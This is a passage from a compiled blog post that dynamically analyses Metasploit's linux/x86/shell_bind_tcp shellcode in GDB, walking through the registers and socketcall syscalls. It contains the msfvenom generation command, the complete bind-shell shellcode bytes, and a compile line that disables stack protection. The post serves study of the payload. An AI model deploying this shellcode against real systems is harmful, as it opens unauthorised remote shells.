{"componentChunkName":"component---src-templates-blog-post-js","path":"/blog/msf-payload-analysis-i/","result":{"data":{"site":{"siteMetadata":{"title":"nnfewl's Blog","author":"nnfewl"}},"mdx":{"id":"6b64926d-21bf-5a94-adaf-8a76f166b389","excerpt":"This note is about the analysis of Metasploit framework generated shellcode. OS: Ubuntu 16.04 32 bit Debugger: GDB Plug-in: pwndbg Payload: linux/x86/shell_bind…","body":"function _extends() { _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; }; return _extends.apply(this, arguments); }\n\nfunction _objectWithoutProperties(source, excluded) { if (source == null) return {}; var target = _objectWithoutPropertiesLoose(source, excluded); var key, i; if (Object.getOwnPropertySymbols) { var sourceSymbolKeys = Object.getOwnPropertySymbols(source); for (i = 0; i < sourceSymbolKeys.length; i++) { key = sourceSymbolKeys[i]; if (excluded.indexOf(key) >= 0) continue; if (!Object.prototype.propertyIsEnumerable.call(source, key)) continue; target[key] = source[key]; } } return target; }\n\nfunction _objectWithoutPropertiesLoose(source, excluded) { if (source == null) return {}; var target = {}; var sourceKeys = Object.keys(source); var key, i; for (i = 0; i < sourceKeys.length; i++) { key = sourceKeys[i]; if (excluded.indexOf(key) >= 0) continue; target[key] = source[key]; } return target; }\n\n/* @jsx mdx */\nvar _frontmatter = {\n  \"title\": \"MSF Payload Analysis I\",\n  \"date\": \"2020-06-18\",\n  \"tags\": [\"shellcode\", \"metasploit\", \"dynamic analysis\"]\n};\n\nvar makeShortcode = function makeShortcode(name) {\n  return function MDXDefaultShortcode(props) {\n    console.warn(\"Component \" + name + \" was not imported, exported, or provided by MDXProvider as global scope\");\n    return mdx(\"div\", props);\n  };\n};\n\nvar 
layoutProps = {\n  _frontmatter: _frontmatter\n};\nvar MDXLayout = \"wrapper\";\nreturn function MDXContent(_ref) {\n  var components = _ref.components,\n      props = _objectWithoutProperties(_ref, [\"components\"]);\n\n  return mdx(MDXLayout, _extends({}, layoutProps, props, {\n    components: components,\n    mdxType: \"MDXLayout\"\n  }), mdx(\"p\", null, \"This note is about the analysis of Metasploit framework generated shellcode.\"), mdx(\"ul\", null, mdx(\"li\", {\n    parentName: \"ul\"\n  }, mdx(\"p\", {\n    parentName: \"li\"\n  }, \"OS: Ubuntu 16.04 32 bit\")), mdx(\"li\", {\n    parentName: \"ul\"\n  }, mdx(\"p\", {\n    parentName: \"li\"\n  }, \"Debugger: GDB\")), mdx(\"li\", {\n    parentName: \"ul\"\n  }, mdx(\"p\", {\n    parentName: \"li\"\n  }, \"Plug-in: pwndbg\")), mdx(\"li\", {\n    parentName: \"ul\"\n  }, mdx(\"p\", {\n    parentName: \"li\"\n  }, \"Payload: linux/x86/shell_bind_tcp\"))), mdx(\"h2\", null, \"Prerequisite\"), mdx(\"p\", null, \"Generate shellcode:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), \"$ msfvenom -p linux/x86/shell_bind_tcp -f c \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token assign-left variable\"\n  }), \"LHOST\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"=\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"0.0\"), \".0.0 \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token assign-left variable\"\n  }), \"LPORT\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"=\"), mdx(\"span\", _extends({\n    
parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"4444\"), \" -b \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"\\\\\"), \"x00\"))), mdx(\"p\", null, \"Output (Payload size: 78 bytes):\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"c\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-c\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-c\"\n  }), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token keyword\"\n  }), \"unsigned\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token keyword\"\n  }), \"char\"), \" buf\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"[\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"]\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"=\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token string\"\n  }), \"\\\"\\\\x31\\\\xdb\\\\xf7\\\\xe3\\\\x53\\\\x43\\\\x53\\\\x6a\\\\x02\\\\x89\\\\xe1\\\\xb0\\\\x66\\\\xcd\\\\x80\\\"\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token string\"\n  }), \"\\\"\\\\x5b\\\\x5e\\\\x52\\\\x68\\\\x02\\\\x00\\\\x11\\\\x5c\\\\x6a\\\\x10\\\\x51\\\\x50\\\\x89\\\\xe1\\\\x6a\\\"\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token string\"\n  }), \"\\\"\\\\x66\\\\x58\\\\xcd\\\\x80\\\\x89\\\\x41\\\\x04\\\\xb3\\\\x04\\\\xb0\\\\x66\\\\xcd\\\\x80\\\\x43\\\\xb0\\\"\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token string\"\n  }), 
\"\\\"\\\\x66\\\\xcd\\\\x80\\\\x93\\\\x59\\\\x6a\\\\x3f\\\\x58\\\\xcd\\\\x80\\\\x49\\\\x79\\\\xf8\\\\x68\\\\x2f\\\"\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token string\"\n  }), \"\\\"\\\\x2f\\\\x73\\\\x68\\\\x68\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x89\\\\xe3\\\\x50\\\\x53\\\\x89\\\\xe1\\\\xb0\\\"\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token string\"\n  }), \"\\\"\\\\x0b\\\\xcd\\\\x80\\\"\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \";\")))), mdx(\"p\", null, \"Compile \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"loader.c\"), \" file into \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"msf_bind_shell\"), \" executable:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"bash\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-bash\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-bash\"\n  }), \"$ gcc -m32 -fno-stack-protector -z execstack load.c -o msf_bind_shell\"))), mdx(\"p\", null, mdx(\"strong\", {\n    parentName: \"p\"\n  }, \"Note:\"), \" Before launching gdb, I recommend using some handy tools to speed up this analysis, because constantly typing \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"disassemble\"), \" or \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"x/gbwx $esp/$eip/...\"), \" hurts my fingers. 
For example, gdb pwn dev extensions like \", mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"https://github.com/pwndbg/pwndbg\"\n  }), \"pwndbg\"), \" or \", mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"https://github.com/hugsy/gef\"\n  }), \"gef\"), \", both are very fine gdb plug-ins which give you a colorful prompt at each breakpoint or interrupt you encounter, containing detailed information like register values, stack layout, etc. In this case, I use pwndbg to help me dissect the functionality of the msf shellcode.\"), mdx(\"h2\", null, \"Dynamic Analysis\"), mdx(\"p\", null, \"Launch GDB:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), \"$ gdb -q ./msf_bind_shell\"))), mdx(\"p\", null, \"Disassemble the main function to locate the memory address of the shellcode entry point:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), \"gdb\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), \" disassemble main\"))), mdx(\"p\", null, \"The entry point is located at the last \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"call\"), \" before function \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"ret\"), \". 
In my case, the shellcode entry point is at \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"0x08048477\"), \".\"), mdx(\"p\", null, \"Then, set breakpoint at this location and run it:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), \"gdb\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token builtin class-name\"\n  }), \"break\"), \" *0x08048477\"))), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), \"gdb\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), \" run\"))), mdx(\"p\", null, \"Now the program will hit this breakpoint, step into entry shellcode execution:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token 
punctuation\"\n  }), \"(\"), \"gdb\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), \" stepi\"))), mdx(\"p\", null, \"If you have the \", mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"https://github.com/pwndbg/pwndbg\"\n  }), \"pwndbg\"), \" plug-in installed, you will now see this prompt:\"), mdx(\"p\", null, mdx(\"span\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"gatsby-resp-image-wrapper\",\n    \"style\": {\n      \"position\": \"relative\",\n      \"display\": \"block\",\n      \"marginLeft\": \"auto\",\n      \"marginRight\": \"auto\",\n      \"maxWidth\": \"590px\"\n    }\n  }), \"\\n      \", mdx(\"a\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"gatsby-resp-image-link\",\n    \"href\": \"/static/ae7c434a0dcf5f31691788a558dc9c07/d9199/2020-06-15_10-51.png\",\n    \"style\": {\n      \"display\": \"block\"\n    },\n    \"target\": \"_blank\",\n    \"rel\": \"noopener\"\n  }), \"\\n    \", mdx(\"span\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-background-image\",\n    \"style\": {\n      \"paddingBottom\": \"73.64864864864865%\",\n      \"position\": \"relative\",\n      \"bottom\": \"0\",\n      \"left\": \"0\",\n      \"backgroundImage\": \"url('data:image/png;base64,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')\",\n      \"backgroundSize\": \"cover\",\n      \"display\": \"block\"\n    }\n  })), \"\\n  \", mdx(\"img\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-image\",\n    \"alt\": \"gdb-pwndbg\",\n    \"title\": \"gdb-pwndbg\",\n    \"src\": \"/static/ae7c434a0dcf5f31691788a558dc9c07/fcda8/2020-06-15_10-51.png\",\n    \"srcSet\": [\"/static/ae7c434a0dcf5f31691788a558dc9c07/12f09/2020-06-15_10-51.png 148w\", \"/static/ae7c434a0dcf5f31691788a558dc9c07/e4a3f/2020-06-15_10-51.png 295w\", 
\"/static/ae7c434a0dcf5f31691788a558dc9c07/fcda8/2020-06-15_10-51.png 590w\", \"/static/ae7c434a0dcf5f31691788a558dc9c07/efc66/2020-06-15_10-51.png 885w\", \"/static/ae7c434a0dcf5f31691788a558dc9c07/d9199/2020-06-15_10-51.png 960w\"],\n    \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n    \"style\": {\n      \"width\": \"100%\",\n      \"height\": \"100%\",\n      \"margin\": \"0\",\n      \"verticalAlign\": \"middle\",\n      \"position\": \"absolute\",\n      \"top\": \"0\",\n      \"left\": \"0\"\n    },\n    \"loading\": \"lazy\"\n  })), \"\\n  \"), \"\\n    \")), mdx(\"p\", null, \"Before diving into the assembly code, here is a quick refresher on each register\\u2019s role when making a syscall. The syscall interface under 32-bit Linux is provided through software interrupt \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"0x80\"), \". The table below describes each register\\u2019s usage when invoking a syscall.\"), mdx(\"table\", null, mdx(\"thead\", {\n    parentName: \"table\"\n  }, mdx(\"tr\", {\n    parentName: \"thead\"\n  }, mdx(\"th\", _extends({\n    parentName: \"tr\"\n  }, {\n    \"align\": null\n  }), \"Register\"), mdx(\"th\", _extends({\n    parentName: \"tr\"\n  }, {\n    \"align\": null\n  }), \"Usage\"))), mdx(\"tbody\", {\n    parentName: \"table\"\n  }, mdx(\"tr\", {\n    parentName: \"tbody\"\n  }, mdx(\"td\", _extends({\n    parentName: \"tr\"\n  }, {\n    \"align\": null\n  }), mdx(\"code\", _extends({\n    parentName: \"td\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"EAX\")), mdx(\"td\", _extends({\n    parentName: \"tr\"\n  }, {\n    \"align\": null\n  }), \"Syscall number\")), mdx(\"tr\", {\n    parentName: \"tbody\"\n  }, mdx(\"td\", _extends({\n    parentName: \"tr\"\n  }, {\n    \"align\": null\n  }), mdx(\"code\", _extends({\n    parentName: \"td\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"EBX\")), mdx(\"td\", _extends({\n    parentName: \"tr\"\n 
 }, {\n    \"align\": null\n  }), \"Argument 1\")), mdx(\"tr\", {\n    parentName: \"tbody\"\n  }, mdx(\"td\", _extends({\n    parentName: \"tr\"\n  }, {\n    \"align\": null\n  }), mdx(\"code\", _extends({\n    parentName: \"td\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"ECX\")), mdx(\"td\", _extends({\n    parentName: \"tr\"\n  }, {\n    \"align\": null\n  }), \"Argument 2\")), mdx(\"tr\", {\n    parentName: \"tbody\"\n  }, mdx(\"td\", _extends({\n    parentName: \"tr\"\n  }, {\n    \"align\": null\n  }), mdx(\"code\", _extends({\n    parentName: \"td\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"EDX\")), mdx(\"td\", _extends({\n    parentName: \"tr\"\n  }, {\n    \"align\": null\n  }), \"Argument 3\")), mdx(\"tr\", {\n    parentName: \"tbody\"\n  }, mdx(\"td\", _extends({\n    parentName: \"tr\"\n  }, {\n    \"align\": null\n  }), mdx(\"code\", _extends({\n    parentName: \"td\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"ESI\")), mdx(\"td\", _extends({\n    parentName: \"tr\"\n  }, {\n    \"align\": null\n  }), \"Argument 4\")), mdx(\"tr\", {\n    parentName: \"tbody\"\n  }, mdx(\"td\", _extends({\n    parentName: \"tr\"\n  }, {\n    \"align\": null\n  }), mdx(\"code\", _extends({\n    parentName: \"td\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"EDI\")), mdx(\"td\", _extends({\n    parentName: \"tr\"\n  }, {\n    \"align\": null\n  }), \"Argument 5\")))), mdx(\"p\", null, \"Now move on, disassemble this frame by use \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"disassemble\"), \" or \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"x/43i $esp\"), \" command.\"), mdx(\"h3\", null, \"Socket() System call\"), mdx(\"p\", null, \"Assembly snippet 1:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"assembly\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  
}, {\n    \"className\": \"language-assembly\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-assembly\"\n  }), \"0x0804a040 <+0>:    xor    ebx, ebx ; shellcode entrance\\n0x0804a042 <+2>:    mul    ebx      ; set both eax, edx to 0x00000000\\n0x0804a044 <+4>:    push   ebx\\n0x0804a045 <+5>:    inc    ebx      ; ebx now holds value 1\\n0x0804a046 <+6>:    push   ebx\\n0x0804a047 <+7>:    push   0x2\\n0x0804a049 <+9>:    mov    ecx, esp ; ecx holds stack address which point to value 2\\n0x0804a04b <+11>:   mov    al, 0x66 ; assign 102 to register al, the sys_socketcall syscall number\\n0x0804a04d <+13>:   int    0x80\"))), mdx(\"p\", null, \"The above code first zeroes out register \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"EBX\"), \", as well as register \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"EAX\"), \" and register \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"EDX\"), \", and pushes \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"EBX\"), \" onto the stack. After that, it increments \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"EBX\"), \" by 1 and pushes it onto the stack, followed by another push of \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"0x2\"), \" onto the stack.\"), mdx(\"p\", null, \"Now the stack frame will look like this:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"assembly\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-assembly\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": 
\"language-assembly\"\n  }), \"         Address      Stack\\n                  +------------+\\n          ....    |    ....    |\\n                  +------------+\\nesp \\u2014\\u25B8 0xbfffef60 | 0x00000002 |\\n                  +------------+\\n       0xbfffef64 | 0x00000001 |\\n                  +------------+\\n       0xbfffef68 | 0x00000000 |\\n                  +------------+\\n          ....    |    ....    |\\n                  +------------+\"))), mdx(\"p\", null, \"Next instruction moves \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"ESP\"), \"\\u2019s value to register \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"ECX\"), \" and move \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"0x66\"), \" (decimal 102) into 8-bit sub-register \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"AL\"), \" from \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"EAX\"), \". 
Now it\\u2019s clear that \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"EBX\"), \" (argument 1) holds 1, which refers to the actual sub-function \", mdx(\"strong\", {\n    parentName: \"p\"\n  }, mdx(\"a\", _extends({\n    parentName: \"strong\"\n  }, {\n    \"href\": \"https://manpages.ubuntu.com/manpages/xenial/man2/socket.2.html\"\n  }), \"socket\")), \" and \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"ECX\"), \" (argument 2) holds the reference to the argument array passed to the sub-function \", mdx(\"strong\", {\n    parentName: \"p\"\n  }, mdx(\"a\", _extends({\n    parentName: \"strong\"\n  }, {\n    \"href\": \"https://manpages.ubuntu.com/manpages/xenial/man2/socket.2.html\"\n  }), \"socket\")), \", with syscall number 102 which stands for the \", mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"https://github.com/torvalds/linux/blob/master/arch/x86/entry/syscalls/syscall_32.tbl\"\n  }), \"sys_socketcall\"), \" system call.\"), mdx(\"p\", null, \"The pwndbg plug-in lists the registers before executing \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"int 0x80\"), \":\"), mdx(\"p\", null, mdx(\"span\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"gatsby-resp-image-wrapper\",\n    \"style\": {\n      \"position\": \"relative\",\n      \"display\": \"block\",\n      \"marginLeft\": \"auto\",\n      \"marginRight\": \"auto\",\n      \"maxWidth\": \"590px\"\n    }\n  }), \"\\n      \", mdx(\"a\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"gatsby-resp-image-link\",\n    \"href\": \"/static/51555e8c749f7d00b3c7dde0e46dbcec/d9199/2020-06-16_22-47.png\",\n    \"style\": {\n      \"display\": \"block\"\n    },\n    \"target\": \"_blank\",\n    \"rel\": \"noopener\"\n  }), \"\\n    \", mdx(\"span\", _extends({\n    parentName: 
\"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-background-image\",\n    \"style\": {\n      \"paddingBottom\": \"70.94594594594594%\",\n      \"position\": \"relative\",\n      \"bottom\": \"0\",\n      \"left\": \"0\",\n      \"backgroundImage\": \"url('data:image/png;base64,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')\",\n      \"backgroundSize\": \"cover\",\n      \"display\": \"block\"\n    }\n  })), \"\\n  \", mdx(\"img\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-image\",\n    \"alt\": \"sys_socket\",\n    \"title\": \"sys_socket\",\n    \"src\": \"/static/51555e8c749f7d00b3c7dde0e46dbcec/fcda8/2020-06-16_22-47.png\",\n    \"srcSet\": [\"/static/51555e8c749f7d00b3c7dde0e46dbcec/12f09/2020-06-16_22-47.png 148w\", \"/static/51555e8c749f7d00b3c7dde0e46dbcec/e4a3f/2020-06-16_22-47.png 295w\", \"/static/51555e8c749f7d00b3c7dde0e46dbcec/fcda8/2020-06-16_22-47.png 590w\", \"/static/51555e8c749f7d00b3c7dde0e46dbcec/efc66/2020-06-16_22-47.png 885w\", \"/static/51555e8c749f7d00b3c7dde0e46dbcec/d9199/2020-06-16_22-47.png 960w\"],\n    \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n    \"style\": {\n      \"width\": \"100%\",\n      \"height\": \"100%\",\n      \"margin\": \"0\",\n      \"verticalAlign\": \"middle\",\n      \"position\": \"absolute\",\n      \"top\": \"0\",\n      \"left\": \"0\"\n    },\n    \"loading\": \"lazy\"\n  })), \"\\n  \"), \"\\n    \")), mdx(\"p\", null, \"Socketcall stands for socket system calls; here is the definition:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"c\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-c\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-c\"\n  }), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token keyword\"\n  }), \"int\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  
}, {\n    \"className\": \"token function\"\n  }), \"socketcall\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token keyword\"\n  }), \"int\"), \" call\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \",\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token keyword\"\n  }), \"unsigned\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token keyword\"\n  }), \"long\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"*\"), \"args\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \";\")))), mdx(\"p\", null, \"And argument description:\"), mdx(\"blockquote\", null, mdx(\"p\", {\n    parentName: \"blockquote\"\n  }, mdx(\"strong\", {\n    parentName: \"p\"\n  }, \"call\"), \" determines which socket function to invoke. 
\", mdx(\"strong\", {\n    parentName: \"p\"\n  }, \"args\"), \" points to a block containing the actual arguments, which are passed through to the appropriate call.\")), mdx(\"p\", null, \"Possible call values are defined as \", mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"https://manpages.ubuntu.com/manpages/bionic/man2/socketcall.2.html\"\n  }), \"follow\"), \":\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"c\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-c\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-c\"\n  }), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token macro property\"\n  }), \"#\", mdx(\"span\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"token directive keyword\"\n  }), \"define\"), \" SYS_SOCKET      1       \"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token comment\"\n  }), \"/* sys_socket(2) */\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token macro property\"\n  }), \"#\", mdx(\"span\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"token directive keyword\"\n  }), \"define\"), \" SYS_BIND        2       \"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token comment\"\n  }), \"/* sys_bind(2) */\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token macro property\"\n  }), \"#\", mdx(\"span\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"token directive keyword\"\n  }), \"define\"), \" SYS_CONNECT     3       \"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token comment\"\n  }), \"/* sys_connect(2) */\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    
